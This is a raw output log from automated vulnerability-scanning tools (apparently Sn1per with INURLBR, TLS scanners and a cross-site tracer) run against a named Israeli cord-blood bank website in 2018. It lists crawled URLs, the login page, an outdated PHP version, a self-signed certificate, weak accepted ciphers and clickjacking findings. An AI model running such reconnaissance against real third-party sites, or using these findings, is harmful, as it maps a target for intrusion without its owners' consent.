  1416. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1417. |_[ + ] More details:: / - / , ISP:
  1418. |_[ + ] Found:: UNIDENTIFIED
  1419.  
  1420. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1421. |_[ + ] [ 35 / 74 ]-[00:27:50] [ - ]
  1422. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=שליה ]
  1423. |_[ + ] Exploit::
  1424. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1425. |_[ + ] More details:: / - / , ISP:
  1426. |_[ + ] Found:: UNIDENTIFIED
  1427.  
  1428. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1429. |_[ + ] [ 36 / 74 ]-[00:27:53] [ - ]
  1430. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תינוק ]
  1431. |_[ + ] Exploit::
  1432. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1433. |_[ + ] More details:: / - / , ISP:
  1434. |_[ + ] Found:: UNIDENTIFIED
  1435.  
  1436. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1437. |_[ + ] [ 37 / 74 ]-[00:27:57] [ - ]
  1438. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=הורים ]
  1439. |_[ + ] Exploit::
  1440. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1441. |_[ + ] More details:: / - / , ISP:
  1442. |_[ + ] Found:: UNIDENTIFIED
  1443.  
  1444. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1445. |_[ + ] [ 38 / 74 ]-[00:28:01] [ - ]
  1446. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=36 ]
  1447. |_[ + ] Exploit::
  1448. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1449. |_[ + ] More details:: / - / , ISP:
  1450. |_[ + ] Found:: UNIDENTIFIED
  1451.  
  1452. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1453. |_[ + ] [ 39 / 74 ]-[00:28:04] [ - ]
  1454. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סוכרת ]
  1455. |_[ + ] Exploit::
  1456. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1457. |_[ + ] More details:: / - / , ISP:
  1458. |_[ + ] Found:: UNIDENTIFIED
  1459.  
  1460. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1461. |_[ + ] [ 40 / 74 ]-[00:28:08] [ - ]
  1462. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=105 ]
  1463. |_[ + ] Exploit::
  1464. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1465. |_[ + ] More details:: / - / , ISP:
  1466. |_[ + ] Found:: UNIDENTIFIED
  1467.  
  1468. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1469. |_[ + ] [ 41 / 74 ]-[00:28:12] [ - ]
  1470. |_[ + ] Target:: [ http://www.cord-blood.co.il/?page_id=9 ]
  1471. |_[ + ] Exploit::
  1472. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1473. |_[ + ] More details:: / - / , ISP:
  1474. |_[ + ] Found:: UNIDENTIFIED
  1475.  
  1476. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1477. |_[ + ] [ 42 / 74 ]-[00:28:16] [ - ]
  1478. |_[ + ] Target:: [ http://www.cord-blood.co.il/?cat=48 ]
  1479. |_[ + ] Exploit::
  1480. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1481. |_[ + ] More details:: / - / , ISP:
  1482. |_[ + ] Found:: UNIDENTIFIED
  1483.  
  1484. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1485. |_[ + ] [ 43 / 74 ]-[00:28:19] [ - ]
  1486. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=פרקינסון ]
  1487. |_[ + ] Exploit::
  1488. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1489. |_[ + ] More details:: / - / , ISP:
  1490. |_[ + ] Found:: UNIDENTIFIED
  1491.  
  1492. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1493. |_[ + ] [ 44 / 74 ]-[00:28:23] [ - ]
  1494. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=טיפול ]
  1495. |_[ + ] Exploit::
  1496. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1497. |_[ + ] More details:: / - / , ISP:
  1498. |_[ + ] Found:: UNIDENTIFIED
  1499.  
  1500. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1501. |_[ + ] [ 45 / 74 ]-[00:28:26] [ - ]
  1502. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=דם-טבורי ]
  1503. |_[ + ] Exploit::
  1504. |_[ + ] Information Server:: HTTP/1.1 302 Found, Server: nginx , IP:80.179.142.111:80
  1505. |_[ + ] More details:: / - / , ISP:
  1506. |_[ + ] Found:: UNIDENTIFIED
  1507.  
  1508. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1509. |_[ + ] [ 46 / 74 ]-[00:28:30] [ - ]
  1510. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=חבל-הטבור ]
  1511. |_[ + ] Exploit::
  1512. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1513. |_[ + ] More details:: / - / , ISP:
  1514. |_[ + ] Found:: UNIDENTIFIED
  1515.  
  1516. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1517. |_[ + ] [ 47 / 74 ]-[00:28:34] [ - ]
  1518. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=חדר-לידה ]
  1519. |_[ + ] Exploit::
  1520. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1521. |_[ + ] More details:: / - / , ISP:
  1522. |_[ + ] Found:: UNIDENTIFIED
  1523.  
  1524. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1525. |_[ + ] [ 48 / 74 ]-[00:28:38] [ - ]
  1526. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מוח-עצם ]
  1527. |_[ + ] Exploit::
  1528. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1529. |_[ + ] More details:: / - / , ISP:
  1530. |_[ + ] Found:: UNIDENTIFIED
  1531.  
  1532. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1533. |_[ + ] [ 49 / 74 ]-[00:28:42] [ - ]
  1534. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=שיתוק-מוחין ]
  1535. |_[ + ] Exploit::
  1536. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1537. |_[ + ] More details:: / - / , ISP:
  1538. |_[ + ] Found:: UNIDENTIFIED
  1539.  
  1540. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1541. |_[ + ] [ 50 / 74 ]-[00:28:46] [ - ]
  1542. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=הקפאת-תאים ]
  1543. |_[ + ] Exploit::
  1544. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1545. |_[ + ] More details:: / - / , ISP:
  1546. |_[ + ] Found:: UNIDENTIFIED
  1547.  
  1548. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1549. |_[ + ] [ 51 / 74 ]-[00:28:50] [ - ]
  1550. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מח-עצם ]
  1551. |_[ + ] Exploit::
  1552. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1553. |_[ + ] More details:: / - / , ISP:
  1554. |_[ + ] Found:: UNIDENTIFIED
  1555.  
  1556. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1557. |_[ + ] [ 52 / 74 ]-[00:28:54] [ - ]
  1558. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=ביטוח-בריאות ]
  1559. |_[ + ] Exploit::
  1560. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1561. |_[ + ] More details:: / - / , ISP:
  1562. |_[ + ] Found:: UNIDENTIFIED
  1563.  
  1564. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1565. |_[ + ] [ 53 / 74 ]-[00:28:58] [ - ]
  1566. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סרטן-הלימפה ]
  1567. |_[ + ] Exploit::
  1568. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1569. |_[ + ] More details:: / - / , ISP:
  1570. |_[ + ] Found:: UNIDENTIFIED
  1571.  
  1572. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1573. |_[ + ] [ 54 / 74 ]-[00:29:02] [ - ]
  1574. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בנק-הדם ]
  1575. |_[ + ] Exploit::
  1576. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1577. |_[ + ] More details:: / - / , ISP:
  1578. |_[ + ] Found:: UNIDENTIFIED
  1579.  
  1580. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1581. |_[ + ] [ 55 / 74 ]-[00:29:06] [ - ]
  1582. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תאי-אב ]
  1583. |_[ + ] Exploit::
  1584. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1585. |_[ + ] More details:: / - / , ISP:
  1586. |_[ + ] Found:: UNIDENTIFIED
  1587.  
  1588. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1589. |_[ + ] [ 56 / 74 ]-[00:29:09] [ - ]
  1590. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מחלות-גנטיות ]
  1591. |_[ + ] Exploit::
  1592. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1593. |_[ + ] More details:: / - / , ISP:
  1594. |_[ + ] Found:: UNIDENTIFIED
  1595.  
  1596. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1597. |_[ + ] [ 57 / 74 ]-[00:29:13] [ - ]
  1598. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תרומת-דם ]
  1599. |_[ + ] Exploit::
  1600. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1601. |_[ + ] More details:: / - / , ISP:
  1602. |_[ + ] Found:: UNIDENTIFIED
  1603.  
  1604. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1605. |_[ + ] [ 58 / 74 ]-[00:29:18] [ - ]
  1606. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=מערכת-החיסון ]
  1607. |_[ + ] Exploit::
  1608. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1609. |_[ + ] More details:: / - / , ISP:
  1610. |_[ + ] Found:: UNIDENTIFIED
  1611.  
  1612. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1613. |_[ + ] [ 59 / 74 ]-[00:29:22] [ - ]
  1614. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=תאי-דם ]
  1615. |_[ + ] Exploit::
  1616. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1617. |_[ + ] More details:: / - / , ISP:
  1618. |_[ + ] Found:: UNIDENTIFIED
  1619.  
  1620. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1621. |_[ + ] [ 60 / 74 ]-[00:29:26] [ - ]
  1622. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=סרטן-השד ]
  1623. |_[ + ] Exploit::
  1624. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1625. |_[ + ] More details:: / - / , ISP:
  1626. |_[ + ] Found:: UNIDENTIFIED
  1627.  
  1628. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1629. |_[ + ] [ 61 / 74 ]-[00:29:30] [ - ]
  1630. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=15&cpage=1 ]
  1631. |_[ + ] Exploit::
  1632. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1633. |_[ + ] More details:: / - / , ISP:
  1634. |_[ + ] Found:: UNIDENTIFIED
  1635.  
  1636. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1637. |_[ + ] [ 62 / 74 ]-[00:29:34] [ - ]
  1638. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=25&cpage=1 ]
  1639. |_[ + ] Exploit::
  1640. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1641. |_[ + ] More details:: / - / , ISP:
  1642. |_[ + ] Found:: UNIDENTIFIED
  1643.  
  1644. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1645. |_[ + ] [ 63 / 74 ]-[00:29:38] [ - ]
  1646. |_[ + ] Target:: [ http://www.cord-blood.co.il/?p=30&cpage=1 ]
  1647. |_[ + ] Exploit::
  1648. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1649. |_[ + ] More details:: / - / , ISP:
  1650. |_[ + ] Found:: UNIDENTIFIED
  1651.  
  1652. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1653. |_[ + ] [ 64 / 74 ]-[00:29:42] [ - ]
  1654. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=איסוף-דם-טבורי ]
  1655. |_[ + ] Exploit::
  1656. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1657. |_[ + ] More details:: / - / , ISP:
  1658. |_[ + ] Found:: UNIDENTIFIED
  1659.  
  1660. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1661. |_[ + ] [ 65 / 74 ]-[00:29:46] [ - ]
  1662. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בנק-דם-טבורי ]
  1663. |_[ + ] Exploit::
  1664. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1665. |_[ + ] More details:: / - / , ISP:
  1666. |_[ + ] Found:: UNIDENTIFIED
  1667.  
  1668. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1669. |_[ + ] [ 66 / 74 ]-[00:29:50] [ - ]
  1670. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=השתלת-מוח-עצם ]
  1671. |_[ + ] Exploit::
  1672. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1673. |_[ + ] More details:: / - / , ISP:
  1674. |_[ + ] Found:: UNIDENTIFIED
  1675.  
  1676. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1677. |_[ + ] [ 67 / 74 ]-[00:29:54] [ - ]
  1678. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=בנק-דם-ציבורי ]
  1679. |_[ + ] Exploit::
  1680. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1681. |_[ + ] More details:: / - / , ISP:
  1682. |_[ + ] Found:: UNIDENTIFIED
  1683.  
  1684. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1685. |_[ + ] [ 68 / 74 ]-[00:29:58] [ - ]
  1686. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=שימור-דם-טבורי ]
  1687. |_[ + ] Exploit::
  1688. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1689. |_[ + ] More details:: / - / , ISP:
  1690. |_[ + ] Found:: UNIDENTIFIED
  1691.  
  1692. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1693. |_[ + ] [ 69 / 74 ]-[00:30:01] [ - ]
  1694. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=הפריה-חוץ-גופית ]
  1695. |_[ + ] Exploit::
  1696. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1697. |_[ + ] More details:: / - / , ISP:
  1698. |_[ + ] Found:: UNIDENTIFIED
  1699.  
  1700. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1701. |_[ + ] [ 70 / 74 ]-[00:30:05] [ - ]
  1702. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=דם-חבל-הטבור ]
  1703. |_[ + ] Exploit::
  1704. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1705. |_[ + ] More details:: / - / , ISP:
  1706. |_[ + ] Found:: UNIDENTIFIED
  1707.  
  1708. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1709. |_[ + ] [ 71 / 74 ]-[00:30:10] [ - ]
  1710. |_[ + ] Target:: [ http://www.cord-blood.co.il/?tag=חומר-שימור-ביולוגי ]
  1711. |_[ + ] Exploit::
  1712. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1713. |_[ + ] More details:: / - / , ISP:
  1714. |_[ + ] Found:: UNIDENTIFIED
  1715.  
  1716. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1717. |_[ + ] [ 72 / 74 ]-[00:30:13] [ - ]
  1718. |_[ + ] Target:: [ http://www.cord-blood.co.il/wp-login.php ]
  1719. |_[ + ] Exploit::
  1720. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1721. |_[ + ] More details:: / - / , ISP:
  1722. |_[ + ] Found:: UNIDENTIFIED
  1723.  
  1724. _[ - ]::--------------------------------------------------------------------------------------------------------------
  1725. |_[ + ] [ 73 / 74 ]-[00:30:16] [ - ]
  1726. |_[ + ] Target:: [ http://www.cord-blood.co.il/wp-login.php?action=lostpassword ]
  1727. |_[ + ] Exploit::
  1728. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx X-Powered-By: PHP/5.2.17, IP:80.179.142.111:80
  1729. |_[ + ] More details:: / - / , ISP:
  1730. |_[ + ] Found:: UNIDENTIFIED
  1731.  
  1732. [ INFO ] [ Shutting down ]
  1733. [ INFO ] [ End of process INURLBR at [23-03-2018 00:30:16]
  1734. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  1735. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cord-blood.co.il.txt ]
  1736. |_________________________________________________________________________________________
  1737. #######################################################################################################################################
  1738.  
  1739.  
  1740.  
  1741. AVAILABLE PLUGINS
  1742. -----------------
  1743.  
  1744. PluginHeartbleed
  1745. PluginCompression
  1746. PluginSessionResumption
  1747. PluginChromeSha1Deprecation
  1748. PluginHSTS
  1749. PluginSessionRenegotiation
  1750. PluginOpenSSLCipherSuites
  1751. PluginCertInfo
  1752.  
  1753.  
  1754.  
  1755. CHECKING HOST(S) AVAILABILITY
  1756. ------------------------------------------------------------------------------------------------------------------------------------
  1757.  
  1758. cord-blood.co.il:443 => 80.179.142.111:443
  1759.  
  1760.  
  1761.  
  1762. SCAN RESULTS FOR CORD-BLOOD.CO.IL:443 - 80.179.142.111:443
  1763. -------------------------------------------------------------------------------------------------------------------------------------
  1764.  
  1765. * Deflate Compression:
  1766. OK - Compression disabled
  1767.  
  1768. * Session Renegotiation:
  1769. Client-initiated Renegotiations: OK - Rejected
  1770. Secure Renegotiation: OK - Supported
  1771.  
  1772. * Certificate - Content:
  1773. SHA1 Fingerprint: f06c27af6a2bb1913392b7926445a9259d73731e
  1774. Common Name: localhost
  1775. Issuer: localhost
  1776. Serial Number: C9C86319C823F93B
  1777. Not Before: Mar 8 07:53:03 2016 GMT
  1778. Not After: Jul 24 07:53:03 2043 GMT
  1779. Signature Algorithm: sha1WithRSAEncryption
  1780. Public Key Algorithm: rsaEncryption
  1781. Key Size: 2048 bit
  1782. Exponent: 65537 (0x10001)
  1783.  
  1784. * Certificate - Trust:
  1785. Hostname Validation: FAILED - Certificate does NOT match cord-blood.co.il
  1786. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1787. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
  1788. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1789. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
  1790. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
  1791. Certificate Chain Received: ['localhost', 'COMODO High-Assurance Secure Server CA', 'AddTrust External CA Root', 'GlobalSign Root CA', 'thawte Primary Root CA', 'VeriSign Class 3 Secure Server CA - G3', 'VeriSign Class 3 Public Primary Certification Authority - G5']
  1792.  
  1793. * Certificate - OCSP Stapling:
  1794. NOT SUPPORTED - Server did not send back an OCSP response.
  1795.  
  1796. * Session Resumption:
  1797. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  1798. With TLS Session Tickets: OK - Supported
  1799.  
  1800. * SSLV2 Cipher Suites:
  1801. Server rejected all cipher suites.
  1802.  
  1803. * SSLV3 Cipher Suites:
  1804. Server rejected all cipher suites.
  1805.  
  1806.  
  1807.  
  1808. SCAN COMPLETED IN 19.08 S
  1809. -------------------------
  1810. Version: 1.11.11-static
  1811. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  1812.  
  1813. Connected to 80.179.142.111
  1814.  
  1815. Testing SSL server cord-blood.co.il on port 443 using SNI name cord-blood.co.il
  1816.  
  1817. TLS Fallback SCSV:
  1818. Server supports TLS Fallback SCSV
  1819.  
  1820. TLS renegotiation:
  1821. Secure session renegotiation supported
  1822.  
  1823. TLS Compression:
  1824. Compression disabled
  1825.  
  1826. Heartbleed:
  1827. TLS 1.2 not vulnerable to heartbleed
  1828. TLS 1.1 not vulnerable to heartbleed
  1829. TLS 1.0 not vulnerable to heartbleed
  1830.  
  1831. Supported Server Cipher(s):
  1832. Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  1833. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  1834. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  1835. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  1836. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  1837. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1838. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  1839. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1840. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  1841. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1842. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  1843. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1844. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1845. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
  1846. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
  1847. Accepted TLSv1.2 128 bits AES128-SHA256
  1848. Accepted TLSv1.2 256 bits AES256-SHA256
  1849. Accepted TLSv1.2 128 bits AES128-SHA
  1850. Accepted TLSv1.2 256 bits AES256-SHA
  1851. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  1852. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
  1853. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  1854. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
  1855. Accepted TLSv1.2 112 bits DES-CBC3-SHA
  1856. Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1857. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1858. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1859. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1860. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1861. Accepted TLSv1.1 128 bits AES128-SHA
  1862. Accepted TLSv1.1 256 bits AES256-SHA
  1863. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  1864. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
  1865. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  1866. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
  1867. Accepted TLSv1.1 112 bits DES-CBC3-SHA
  1868. Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  1869. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  1870. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  1871. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  1872. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
  1873. Accepted TLSv1.0 128 bits AES128-SHA
  1874. Accepted TLSv1.0 256 bits AES256-SHA
  1875. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
  1876. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
  1877. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
  1878. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
  1879. Accepted TLSv1.0 112 bits DES-CBC3-SHA
  1880.  
  1881. SSL Certificate:
  1882. Signature Algorithm: sha1WithRSAEncryption
  1883. RSA Key Strength: 2048
  1884.  
  1885. Subject: localhost
  1886. Issuer: localhost
  1887.  
  1888. Not valid before: Mar 8 07:53:03 2016 GMT
  1889. Not valid after: Jul 24 07:53:03 2043 GMT
  1890.  
  1891. #######################################################################################################################################
  1892.  
  1893. __ ______ _____
  1894. \ \/ / ___|_ _|
  1895. \ /\___ \ | |
  1896. / \ ___) || |
  1897. /_/\_|____/ |_|
  1898.  
  1899. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1900. + -- --=[Target: cord-blood.co.il:8080
  1901. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1902. + -- --=[Site not vulnerable to Host Header Injection!
  1903. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1904. + -- --=[Site vulnerable to Clickjacking!
  1905.  
  1906. HTTP/1.1 400 Bad Request
  1907. Date: Fri, 23 Mar 2018 04:37:51 GMT
  1908. Server: Apache/6.6.6
  1909. Content-Length: 347
  1910. Connection: close
  1911. Content-Type: text/html; charset=iso-8859-1
  1912.  
  1913. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1914. <html><head>
  1915. <title>400 Bad Request</title>
  1916. </head><body>
  1917. <h1>Bad Request</h1>
  1918. <p>Your browser sent a request that this server could not understand.<br />
  1919. </p>
  1920. <p>Additionally, a 400 Bad Request
  1921. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1922. </body></html>
  1923.  
  1924. HTTP/1.1 400 Bad Request
  1925. Date: Fri, 23 Mar 2018 04:38:00 GMT
  1926. Server: Apache/6.6.6
  1927. Content-Length: 347
  1928. Connection: close
  1929. Content-Type: text/html; charset=iso-8859-1
  1930.  
  1931. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1932. <html><head>
  1933. <title>400 Bad Request</title>
  1934. </head><body>
  1935. <h1>Bad Request</h1>
  1936. <p>Your browser sent a request that this server could not understand.<br />
  1937. </p>
